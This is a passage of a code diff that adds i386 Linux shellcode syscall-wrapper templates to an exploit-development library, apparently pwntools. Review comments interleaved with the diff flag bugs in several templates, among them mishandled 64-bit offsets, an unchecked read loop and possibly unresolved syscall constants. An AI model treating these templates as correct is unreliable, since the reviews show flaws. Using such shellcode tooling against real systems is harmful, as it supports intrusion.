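Review bot: The sysctl name vector in pidmax looks reversed: `${push(CTL_KERN)}` is emitted before `${push(KERN_PIDMAX)}`, so after `mov ecx, esp` the array at ecx reads {55, 1} rather than {CTL_KERN, KERN_PIDMAX}; the stack grows down, which is exactly why the `__sysctl_args` members just below are pushed last-member-first. Swap the two lines, `${push(KERN_PIDMAX)}` then `${push(CTL_KERN)}`, so name[0] is the top-level CTL_KERN. The docstring should also say that `SYS__sysctl` is the deprecated binary sysctl interface (needs CONFIG_SYSCTL_SYSCALL and otherwise returns -ENOSYS) and that the return value is not checked, so on failure the caller receives the `0xffff` seed from the oldval slot as if it were pid_max. Minor: `mov` is imported but unused, and the comment `/* ebp = oldval and frame pointer R*/` has a stray `R`.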
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pipedes"/> +<%docstring> +Invokes the syscall pipe. See 'man 2 pipe' for more information. + +Arguments: + pipedes(int): pipedes + + + ${syscall('SYS_pipe', pipedes)} diff --git a/pwnlib/shellcraft/templates/i386/linux/pipe2.asm b/pwnlib/shellcraft/templates/i386/linux/pipe2.asm new file mode 100644 index 000000000..7dc8cd094 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/pipe2.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pipedes, flags"/> +<%docstring> +Invokes the syscall pipe2. See 'man 2 pipe2' for more information. + +Arguments: + pipedes(int): pipedes + flags(int): flags + + + ${syscall('SYS_pipe2', pipedes, flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/poll.asm b/pwnlib/shellcraft/templates/i386/linux/poll.asm new file mode 100644 index 000000000..b0ad603a6 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/poll.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fds, nfds, timeout"/> +<%docstring> +Invokes the syscall poll. See 'man 2 poll' for more information. + +Arguments: + fds(pollfd): fds + nfds(nfds_t): nfds + timeout(int): timeout + + + ${syscall('SYS_poll', fds, nfds, timeout)} diff --git a/pwnlib/shellcraft/templates/i386/linux/ppoll.asm b/pwnlib/shellcraft/templates/i386/linux/ppoll.asm new file mode 100644 index 000000000..b59e0cbe0 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/ppoll.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fds, nfds, timeout, ss"/> +<%docstring> +Invokes the syscall ppoll. See 'man 2 ppoll' for more information. + +Arguments: + fds(pollfd): fds + nfds(nfds_t): nfds + timeout(timespec): timeout + ss(sigset_t): ss + + + ${syscall('SYS_ppoll', fds, nfds, timeout, ss)} 
diff --git a/pwnlib/shellcraft/templates/i386/linux/prctl.asm b/pwnlib/shellcraft/templates/i386/linux/prctl.asm new file mode 100644 index 000000000..45f85efd9 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/prctl.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="option, *vararg"/> +<%docstring> +Invokes the syscall prctl. See 'man 2 prctl' for more information. + +Arguments: + option(int): option + vararg(int): vararg + + + ${syscall('SYS_prctl', option, *vararg)} diff --git a/pwnlib/shellcraft/templates/i386/linux/pread.asm b/pwnlib/shellcraft/templates/i386/linux/pread.asm new file mode 100644 index 000000000..f9032e71b --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/pread.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, buf, nbytes, offset"/> +<%docstring> +Invokes the syscall pread. See 'man 2 pread' for more information. + +Arguments: + fd(int): fd + buf(void): buf + nbytes(size_t): nbytes + offset(off_t): offset + + + ${syscall('SYS_pread', fd, buf, nbytes, offset)} diff --git a/pwnlib/shellcraft/templates/i386/linux/preadv.asm b/pwnlib/shellcraft/templates/i386/linux/preadv.asm new file mode 100644 index 000000000..2d06168b0 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/preadv.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, iovec, count, offset"/> +<%docstring> +Invokes the syscall preadv. See 'man 2 preadv' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + offset(off_t): offset + + + ${syscall('SYS_preadv', fd, iovec, count, offset)} diff --git a/pwnlib/shellcraft/templates/i386/linux/prlimit64.asm b/pwnlib/shellcraft/templates/i386/linux/prlimit64.asm new file mode 100644 index 000000000..0a9b347de --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/prlimit64.asm 
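Review bot: The pread template passes `offset` as a single register argument, but the i386 syscall behind it is pread64, whose 64-bit `loff_t` offset occupies two consecutive 32-bit argument registers (low, then high); with only four arguments the fifth register keeps whatever it held and becomes the high half of the file offset. Unless `syscall()` zero-fills unused argument registers (not visible here), pass the high word explicitly, `${syscall('SYS_pread64', fd, buf, nbytes, offset, 0)}` using whichever of `SYS_pread`/`SYS_pread64` the i386 constants define, and document it as `offset(off_t): low 32 bits of the file offset; the high word is passed as 0`. The same shape applies to `preadv` in the next hunk and to `pwrite`/`pwritev` later in this series. I also cannot see an i386 `SYS_pread` constant in this diff (the kernel table calls it `pread64`), so please confirm the symbol resolves.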
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pid, resource, new_limit, old_limit"/> +<%docstring> +Invokes the syscall prlimit64. See 'man 2 prlimit64' for more information. + +Arguments: + pid(pid_t): pid + resource(rlimit_resource): resource + new_limit(rlimit64): new_limit + old_limit(rlimit64): old_limit + + + ${syscall('SYS_prlimit64', pid, resource, new_limit, old_limit)} diff --git a/pwnlib/shellcraft/templates/i386/linux/profil.asm b/pwnlib/shellcraft/templates/i386/linux/profil.asm new file mode 100644 index 000000000..72ec369da --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/profil.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="sample_buffer, size, offset, scale"/> +<%docstring> +Invokes the syscall profil. See 'man 2 profil' for more information. + +Arguments: + sample_buffer(unsigned): sample_buffer + size(size_t): size + offset(size_t): offset + scale(unsigned): scale + + + ${syscall('SYS_profil', sample_buffer, size, offset, scale)} diff --git a/pwnlib/shellcraft/templates/i386/linux/ptrace.asm b/pwnlib/shellcraft/templates/i386/linux/ptrace.asm new file mode 100644 index 000000000..955342e90 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/ptrace.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="request, *vararg"/> +<%docstring> +Invokes the syscall ptrace. See 'man 2 ptrace' for more information. + +Arguments: + request(ptrace_request): request + vararg(int): vararg + + + ${syscall('SYS_ptrace', request, *vararg)} diff --git a/pwnlib/shellcraft/templates/i386/linux/push.asm b/pwnlib/shellcraft/templates/i386/linux/push.asm index 99efdff4f..bea7ff03a 100644 --- a/pwnlib/shellcraft/templates/i386/linux/push.asm +++ b/pwnlib/shellcraft/templates/i386/linux/push.asm 
@@ -11,7 +11,7 @@ Thin wrapper around :func:`pwnlib.shellcraft.i386.push`, which sets Example: >>> print pwnlib.shellcraft.i386.linux.push('SYS_execve').rstrip() - /* push (SYS_execve) == 0xb */ + /* push (SYS_execve) (0xb) */ push 0xb diff --git a/pwnlib/shellcraft/templates/i386/linux/putpmsg.asm b/pwnlib/shellcraft/templates/i386/linux/putpmsg.asm new file mode 100644 index 000000000..5f8f2b0f3 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/putpmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fildes, ctlptr, dataptr, band, flags"/> +<%docstring> +Invokes the syscall putpmsg. See 'man 2 putpmsg' for more information. + +Arguments: + fildes(int): fildes + ctlptr(strbuf): ctlptr + dataptr(strbuf): dataptr + band(int): band + flags(int): flags + + + ${syscall('SYS_putpmsg', fildes, ctlptr, dataptr, band, flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/pwrite.asm b/pwnlib/shellcraft/templates/i386/linux/pwrite.asm new file mode 100644 index 000000000..840667cf3 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/pwrite.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, buf, n, offset"/> +<%docstring> +Invokes the syscall pwrite. See 'man 2 pwrite' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + offset(off_t): offset + + + ${syscall('SYS_pwrite', fd, buf, n, offset)} diff --git a/pwnlib/shellcraft/templates/i386/linux/pwritev.asm b/pwnlib/shellcraft/templates/i386/linux/pwritev.asm new file mode 100644 index 000000000..35bc342d7 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/pwritev.asm 
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, iovec, count, offset"/> +<%docstring> +Invokes the syscall pwritev. See 'man 2 pwritev' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + offset(off_t): offset + + + ${syscall('SYS_pwritev', fd, iovec, count, offset)} diff --git a/pwnlib/shellcraft/templates/i386/linux/readahead.asm b/pwnlib/shellcraft/templates/i386/linux/readahead.asm new file mode 100644 index 000000000..8aa07b4fa --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/readahead.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, offset, count"/> +<%docstring> +Invokes the syscall readahead. See 'man 2 readahead' for more information. + +Arguments: + fd(int): fd + offset(off64_t): offset + count(size_t): count + + + ${syscall('SYS_readahead', fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/i386/linux/readdir.asm b/pwnlib/shellcraft/templates/i386/linux/readdir.asm new file mode 100644 index 000000000..010c21986 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/readdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="dirp"/> +<%docstring> +Invokes the syscall readdir. See 'man 2 readdir' for more information. + +Arguments: + dirp(DIR): dirp + + + ${syscall('SYS_readdir', dirp)} diff --git a/pwnlib/shellcraft/templates/i386/linux/readlink.asm b/pwnlib/shellcraft/templates/i386/linux/readlink.asm new file mode 100644 index 000000000..6b16c1bb4 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/readlink.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="path, buf, len"/> +<%docstring> +Invokes the syscall readlink. See 'man 2 readlink' for more information. + +Arguments: + path(char): path + buf(char): buf + len(size_t): len + + + ${syscall('SYS_readlink', path, buf, len)} 
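Review bot: The readahead template documents `offset(off64_t)` yet passes it as one 32-bit register; on i386 a 64-bit syscall argument takes two consecutive registers (low, high), so as written `count` lands in the high-offset slot and the real count register is left with whatever it held. The call should be `${syscall('SYS_readahead', fd, offset, 0, count)}` with the docstring noting that the high 32 bits of the offset are passed as zero, unless `syscall()` already splits wide arguments, which I cannot see from here. This is the same 64-bit-split issue as pread/pwrite earlier in the series.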
diff --git a/pwnlib/shellcraft/templates/i386/linux/readlinkat.asm b/pwnlib/shellcraft/templates/i386/linux/readlinkat.asm
new file mode 100644
index 000000000..e983e244c
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/readlinkat.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="fd, path, buf, len"/>
+<%docstring>
+Invokes the syscall readlinkat. See 'man 2 readlinkat' for more information.
+
+Arguments:
+ fd(int): fd
+ path(char): path
+ buf(char): buf
+ len(size_t): len
+
+
+ ${syscall('SYS_readlinkat', fd, path, buf, len)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/readn.asm b/pwnlib/shellcraft/templates/i386/linux/readn.asm
new file mode 100644
index 000000000..c5f2dc3c9
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/readn.asm
@@ -0,0 +1,23 @@
+<%
+ from pwnlib.shellcraft.i386.linux import read
+ from pwnlib.shellcraft.i386 import setregs
+ from pwnlib.shellcraft import common
+%>
+<%page args="fd, buf, nbytes"/>
+<%docstring>
+Reads exactly nbytes bytes from file descriptor fd into the buffer buf.
+
+Arguments:
+ fd(int): fd
+ buf(void): buf
+ nbytes(size_t): nbytes
+
+<%
+readn_loop = common.label('readn_loop')
+%>
+ ${setregs({'ecx': buf, 'edx': nbytes})}
+${readn_loop}:
+ ${read(fd, 'ecx', 'edx')}
+ add ecx, eax
+ sub edx, eax
+ jnz ${readn_loop}
diff --git a/pwnlib/shellcraft/templates/i386/linux/readv.asm b/pwnlib/shellcraft/templates/i386/linux/readv.asm
new file mode 100644
index 000000000..b97ef8a7e
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/readv.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="fd, iovec, count"/>
+<%docstring>
+Invokes the syscall readv. See 'man 2 readv' for more information.
+
+Arguments:
+ fd(int): fd
+ iovec(iovec): iovec
+ count(int): count
+
+
+ ${syscall('SYS_readv', fd, iovec, count)}
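Review bot: The readn loop assumes every `read` returns a positive count: a 0 return (EOF) leaves edx unchanged and the loop spins forever, and a negative return (-EINTR, -EAGAIN, -EBADF, ...) is added to ecx and subtracted from edx, so the buffer pointer walks backwards and the remaining count grows beyond `nbytes`, and the next read writes outside `buf`. Test the result before accounting for it and leave the loop on `<= 0`; that needs a second label, so the rewrite is below. The loop also relies on the kernel preserving ecx/edx across the syscall, which holds for i386, but an `fd` that `setregs` has to materialise through ecx or edx would clobber the running pointer, so a comment that `fd` must not be one of those registers would be cheap insurance.
```mako
<%
readn_loop = common.label('readn_loop')
readn_done = common.label('readn_done')
%>
    ${setregs({'ecx': buf, 'edx': nbytes})}
${readn_loop}:
    ${read(fd, 'ecx', 'edx')}
    /* EOF (0) or -errno: stop instead of spinning or walking the pointer backwards */
    test eax, eax
    jle ${readn_done}
    add ecx, eax
    sub edx, eax
    jnz ${readn_loop}
${readn_done}:
```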
diff --git a/pwnlib/shellcraft/templates/i386/linux/recv.asm b/pwnlib/shellcraft/templates/i386/linux/recv.asm new file mode 100644 index 000000000..04564ae67 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/recv.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, buf, n, flags"/> +<%docstring> +Invokes the syscall recv. See 'man 2 recv' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + flags(int): flags + + + ${syscall('SYS_recv', fd, buf, n, flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/recvfrom.asm b/pwnlib/shellcraft/templates/i386/linux/recvfrom.asm new file mode 100644 index 000000000..70563acd8 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/recvfrom.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, buf, n, flags, addr, addr_len"/> +<%docstring> +Invokes the syscall recvfrom. See 'man 2 recvfrom' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + flags(int): flags + addr(SOCKADDR_ARG): addr + addr_len(socklen_t): addr_len + + + ${syscall('SYS_recvfrom', fd, buf, n, flags, addr, addr_len)} diff --git a/pwnlib/shellcraft/templates/i386/linux/recvmmsg.asm b/pwnlib/shellcraft/templates/i386/linux/recvmmsg.asm new file mode 100644 index 000000000..bcdfc8e0d --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/recvmmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, vmessages, vlen, flags, tmo"/> +<%docstring> +Invokes the syscall recvmmsg. See 'man 2 recvmmsg' for more information. + +Arguments: + fd(int): fd + vmessages(mmsghdr): vmessages + vlen(unsigned): vlen + flags(int): flags + tmo(timespec): tmo + + + ${syscall('SYS_recvmmsg', fd, vmessages, vlen, flags, tmo)} 
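Review bot: `SYS_recv` (and `SYS_recvfrom` / `SYS_recvmmsg` in the following hunks) may not exist as an i386 syscall number: historically i386 has no direct socket syscalls and multiplexes them through `SYS_socketcall` with a subcall index (SYS_RECV) and a pointer to an argument array, so unless the i386 constants in this merge define these names the template fails at assembly time. If the constants are absent, the template should push flags, n, buf, fd in reverse order and emit `${syscall('SYS_socketcall', 'SYS_RECV', 'esp')}`, or at least the docstring should state which kernels provide a direct entry. I cannot see the i386 constants module from here, so please verify the symbols resolve before relying on these wrappers.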
diff --git a/pwnlib/shellcraft/templates/i386/linux/recvmsg.asm b/pwnlib/shellcraft/templates/i386/linux/recvmsg.asm new file mode 100644 index 000000000..ff15faefd --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/recvmsg.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, message, flags"/> +<%docstring> +Invokes the syscall recvmsg. See 'man 2 recvmsg' for more information. + +Arguments: + fd(int): fd + message(msghdr): message + flags(int): flags + + + ${syscall('SYS_recvmsg', fd, message, flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/remap_file_pages.asm b/pwnlib/shellcraft/templates/i386/linux/remap_file_pages.asm new file mode 100644 index 000000000..10406cef0 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/remap_file_pages.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="start, size, prot, pgoff, flags"/> +<%docstring> +Invokes the syscall remap_file_pages. See 'man 2 remap_file_pages' for more information. + +Arguments: + start(void): start + size(size_t): size + prot(int): prot + pgoff(size_t): pgoff + flags(int): flags + + + ${syscall('SYS_remap_file_pages', start, size, prot, pgoff, flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/rename.asm b/pwnlib/shellcraft/templates/i386/linux/rename.asm new file mode 100644 index 000000000..d9195a129 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/rename.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="old, new"/> +<%docstring> +Invokes the syscall rename. See 'man 2 rename' for more information. + +Arguments: + old(char): old + new(char): new + + + ${syscall('SYS_rename', old, new)} diff --git a/pwnlib/shellcraft/templates/i386/linux/renameat.asm b/pwnlib/shellcraft/templates/i386/linux/renameat.asm new file mode 100644 index 000000000..e78cc4696 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/renameat.asm 
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="oldfd, old, newfd, new"/> +<%docstring> +Invokes the syscall renameat. See 'man 2 renameat' for more information. + +Arguments: + oldfd(int): oldfd + old(char): old + newfd(int): newfd + new(char): new + + + ${syscall('SYS_renameat', oldfd, old, newfd, new)} diff --git a/pwnlib/shellcraft/templates/i386/linux/rmdir.asm b/pwnlib/shellcraft/templates/i386/linux/rmdir.asm new file mode 100644 index 000000000..11515ce61 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/rmdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall rmdir. See 'man 2 rmdir' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_rmdir', path)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sched_get_priority_max.asm b/pwnlib/shellcraft/templates/i386/linux/sched_get_priority_max.asm new file mode 100644 index 000000000..87ff05cb6 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sched_get_priority_max.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="algorithm"/> +<%docstring> +Invokes the syscall sched_get_priority_max. See 'man 2 sched_get_priority_max' for more information. + +Arguments: + algorithm(int): algorithm + + + ${syscall('SYS_sched_get_priority_max', algorithm)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sched_get_priority_min.asm b/pwnlib/shellcraft/templates/i386/linux/sched_get_priority_min.asm new file mode 100644 index 000000000..9d81c3ab2 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sched_get_priority_min.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="algorithm"/> +<%docstring> +Invokes the syscall sched_get_priority_min. See 'man 2 sched_get_priority_min' for more information. + +Arguments: + algorithm(int): algorithm + + + ${syscall('SYS_sched_get_priority_min', algorithm)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sched_getaffinity.asm b/pwnlib/shellcraft/templates/i386/linux/sched_getaffinity.asm new file mode 100644 index 000000000..5d717bf8d --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sched_getaffinity.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pid, cpusetsize, cpuset"/> +<%docstring> +Invokes the syscall sched_getaffinity. See 'man 2 sched_getaffinity' for more information. + +Arguments: + pid(pid_t): pid + cpusetsize(size_t): cpusetsize + cpuset(cpu_set_t): cpuset + + + ${syscall('SYS_sched_getaffinity', pid, cpusetsize, cpuset)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sched_getparam.asm b/pwnlib/shellcraft/templates/i386/linux/sched_getparam.asm new file mode 100644 index 000000000..77860b2d7 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sched_getparam.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pid, param"/> +<%docstring> +Invokes the syscall sched_getparam. See 'man 2 sched_getparam' for more information. + +Arguments: + pid(pid_t): pid + param(sched_param): param + + + ${syscall('SYS_sched_getparam', pid, param)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sched_getscheduler.asm b/pwnlib/shellcraft/templates/i386/linux/sched_getscheduler.asm new file mode 100644 index 000000000..d997a9f80 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sched_getscheduler.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall sched_getscheduler. See 'man 2 sched_getscheduler' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_sched_getscheduler', pid)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sched_rr_get_interval.asm b/pwnlib/shellcraft/templates/i386/linux/sched_rr_get_interval.asm new file mode 100644 index 000000000..9c674dd8c --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sched_rr_get_interval.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pid, t"/> +<%docstring> +Invokes the syscall sched_rr_get_interval. See 'man 2 sched_rr_get_interval' for more information. + +Arguments: + pid(pid_t): pid + t(timespec): t + + + ${syscall('SYS_sched_rr_get_interval', pid, t)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sched_setaffinity.asm b/pwnlib/shellcraft/templates/i386/linux/sched_setaffinity.asm new file mode 100644 index 000000000..8c64cda6a --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sched_setaffinity.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pid, cpusetsize, cpuset"/> +<%docstring> +Invokes the syscall sched_setaffinity. See 'man 2 sched_setaffinity' for more information. + +Arguments: + pid(pid_t): pid + cpusetsize(size_t): cpusetsize + cpuset(cpu_set_t): cpuset + + + ${syscall('SYS_sched_setaffinity', pid, cpusetsize, cpuset)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sched_setparam.asm b/pwnlib/shellcraft/templates/i386/linux/sched_setparam.asm new file mode 100644 index 000000000..041ac374c --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sched_setparam.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pid, param"/> +<%docstring> +Invokes the syscall sched_setparam. See 'man 2 sched_setparam' for more information. + +Arguments: + pid(pid_t): pid + param(sched_param): param + + + ${syscall('SYS_sched_setparam', pid, param)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sched_setscheduler.asm b/pwnlib/shellcraft/templates/i386/linux/sched_setscheduler.asm new file mode 100644 index 000000000..7d88ebb9d --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sched_setscheduler.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pid, policy, param"/> +<%docstring> +Invokes the syscall sched_setscheduler. See 'man 2 sched_setscheduler' for more information. + +Arguments: + pid(pid_t): pid + policy(int): policy + param(sched_param): param + + + ${syscall('SYS_sched_setscheduler', pid, policy, param)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sched_yield.asm b/pwnlib/shellcraft/templates/i386/linux/sched_yield.asm new file mode 100644 index 000000000..2527ca1f1 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sched_yield.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall sched_yield. See 'man 2 sched_yield' for more information. + +Arguments: + + + + ${syscall('SYS_sched_yield')} diff --git a/pwnlib/shellcraft/templates/i386/linux/select.asm b/pwnlib/shellcraft/templates/i386/linux/select.asm new file mode 100644 index 000000000..b943a457b --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/select.asm 
@@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="nfds, readfds, writefds, exceptfds, timeout"/> +<%docstring> +Invokes the syscall select. See 'man 2 select' for more information. + +Arguments: + nfds(int): nfds + readfds(fd_set): readfds + writefds(fd_set): writefds + exceptfds(fd_set): exceptfds + timeout(timeval): timeout + + + ${syscall('SYS_select', nfds, readfds, writefds, exceptfds, timeout)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sendfile.asm b/pwnlib/shellcraft/templates/i386/linux/sendfile.asm new file mode 100644 index 000000000..2b0845e17 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sendfile.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="out_fd, in_fd, offset, count"/> +<%docstring> +Invokes the syscall sendfile. See 'man 2 sendfile' for more information. + +Arguments: + out_fd(int): out_fd + in_fd(int): in_fd + offset(off_t): offset + count(size_t): count + + + ${syscall('SYS_sendfile', out_fd, in_fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sendfile64.asm b/pwnlib/shellcraft/templates/i386/linux/sendfile64.asm new file mode 100644 index 000000000..5197588a9 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sendfile64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="out_fd, in_fd, offset, count"/> +<%docstring> +Invokes the syscall sendfile64. See 'man 2 sendfile64' for more information. + +Arguments: + out_fd(int): out_fd + in_fd(int): in_fd + offset(off64_t): offset + count(size_t): count + + + ${syscall('SYS_sendfile64', out_fd, in_fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/i386/linux/setdomainname.asm b/pwnlib/shellcraft/templates/i386/linux/setdomainname.asm new file mode 100644 index 000000000..5164efeec --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/setdomainname.asm 
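Review bot: On i386 the number pwnlib exposes as `SYS_select` is, as far as I can tell, the legacy entry (82) whose kernel handler takes a single pointer to a five-word argument block, while the five-register form that `man 2 select` documents is `SYS__newselect` (142). If that holds, `${syscall('SYS_select', nfds, readfds, writefds, exceptfds, timeout)}` makes the kernel read `nfds` as the block pointer and ignore the other four values. Either switch the template to `SYS__newselect` or state in the docstring that the caller must build the legacy argument block; a doctest that assembles and runs a select on a pipe would pin whichever is intended.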
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="name, len"/> +<%docstring> +Invokes the syscall setdomainname. See 'man 2 setdomainname' for more information. + +Arguments: + name(char): name + len(size_t): len + + + ${syscall('SYS_setdomainname', name, len)} diff --git a/pwnlib/shellcraft/templates/i386/linux/setgid.asm b/pwnlib/shellcraft/templates/i386/linux/setgid.asm new file mode 100644 index 000000000..ebea5dd73 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/setgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="gid"/> +<%docstring> +Invokes the syscall setgid. See 'man 2 setgid' for more information. + +Arguments: + gid(gid_t): gid + + + ${syscall('SYS_setgid', gid)} diff --git a/pwnlib/shellcraft/templates/i386/linux/setgroups.asm b/pwnlib/shellcraft/templates/i386/linux/setgroups.asm new file mode 100644 index 000000000..ffa3f3c88 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/setgroups.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="n, groups"/> +<%docstring> +Invokes the syscall setgroups. See 'man 2 setgroups' for more information. + +Arguments: + n(size_t): n + groups(gid_t): groups + + + ${syscall('SYS_setgroups', n, groups)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sethostname.asm 